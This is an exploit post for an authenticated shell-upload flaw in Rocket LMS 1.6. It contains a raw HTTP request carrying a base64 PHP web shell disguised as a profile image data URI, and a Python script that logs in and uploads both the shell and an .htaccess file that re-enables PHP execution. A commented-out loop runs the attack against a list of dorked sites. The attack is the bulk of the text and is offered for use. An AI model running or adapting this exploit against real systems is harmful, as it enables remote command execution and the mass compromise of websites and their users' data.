Rocket LMS 1.6 Shell Upload
# Exploit Title: Rocket LMS – Learning Management System Shell Upload
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735
# Version: Version 1.6
# Tested on Ubuntu 18.04
base64 encode your payload
after data image write your extension
upload
—–
There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.
Enjoy!
——-Request———–
POST /panel/setting HTTP/1.1
Host: localhost
Content-Length: 214
Cache-Control: max-age=0
sec-ch-ua: “Chromium”;v=”103″, “.Not/A)Brand”;v=”99″
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: “Linux”
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Referer: http://localhost/panel/setting/step/2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3D
Connection: close
_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==
&cover_img=%2Fstore%2F995%2F7.jpg
Exploit:
import time
import requests
import base64
import re
import traceback
class Rocket:
def __init__(self,ssl,host,port,email,password,file):
self._url_to_upload = “/panel/setting”
self._url_to_login = “/login”
self.host = host
self.port = port
self.ssl = ssl
self.email = email
self.password = password
self.file = file
def get_csrf_token(self,client,URL):
fromt = client.get(URL)
if ‘XSRF-TOKEN’ in client.cookies:
csrftoken = re.findall(r'<input type=”hidden” name=”_token” value=”(.*)”‘,fromt.text)[0]
return csrftoken
else:
print(“Error while fetching token”)
return
def login(self):
client = requests.session()
if self.ssl == True:
ssl= “https://”
else:
ssl= “http://”
URL = str(ssl+self.host+”:”+self.port+self._url_to_login)
URL2 = str(ssl+self.host+”:”+self.port+self._url_to_upload)
csrftoken = self.get_csrf_token(client,URL)
fromt = client.get(URL) # sets cookie
login_data = dict(username=self.email, password=self.password, _token=csrftoken, next=’/panel’)
r = client.post(URL, data=login_data, cookies=client.cookies)
self.upload_shell(client,URL2)
self.upload_htaccess(client,URL2)
def upload_shell(self,client,URL):
csrftoken = self.get_csrf_token(client,URL)
with open(self.file,”r”) as payload:
to_base64 = payload.read()
to_base64 = str(to_base64).encode(“utf-8”)
base64_encoded_data= base64.b64encode(to_base64)
base64_encoded_data = str(base64_encoded_data)[:-1]
base64_encoded_data = str(base64_encoded_data)[2:]
string = “data:image/php;base64,”+str(base64_encoded_data)
data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img=””)
r = client.post(URL, data=data, cookies=client.cookies)
print(r.status_code)
if r.status_code == 200:
print(“sent and uploaded shell :”+URL+”\n”)
else:
print(“couldn’t upload shell”)
def upload_htaccess(self,client,URL):
csrftoken = self.get_csrf_token(client,URL)
string = “data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4=”
data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img=””)
r = client.post(URL, data=data, cookies=client.cookies)
print(r.status_code)
if r.status_code == 200:
print(“sent and uploaded htaccess:”+URL+”\n”)
print(“Go and rename file in filemanager on website”)
else:
print(“couldn’t upload htaccess”)
elon = Rocket(True,”localhost”,”443″,”[email protected]”,”student” ,”/home/mm1nd/Desktop/shell.txt”)
elon.login()
#with dork
# try:
# with open(“sites.txt”,”r”) as urls:
# url = urls.readlines()
# ssl = True
# port = 443
# for line in url:
# try:
# if “sslyok” in line:
# port = 80
# ssl = False
# line = str(line.rstrip(‘%0a’))
# print(“trying:”+line)
# elon = Rocket(ssl,line.rstrip(“\n”),str(port),”[email protected]”,”student” ,”/home/mm1nd/Desktop/shell.txt”)
# elon.login()
# time.sleep(1)
# except Exception:
# #traceback.print_exc()
# print(“atamadim”)
# finally:
# print(“okey”)
# except Exception:
# print(“atamadim”)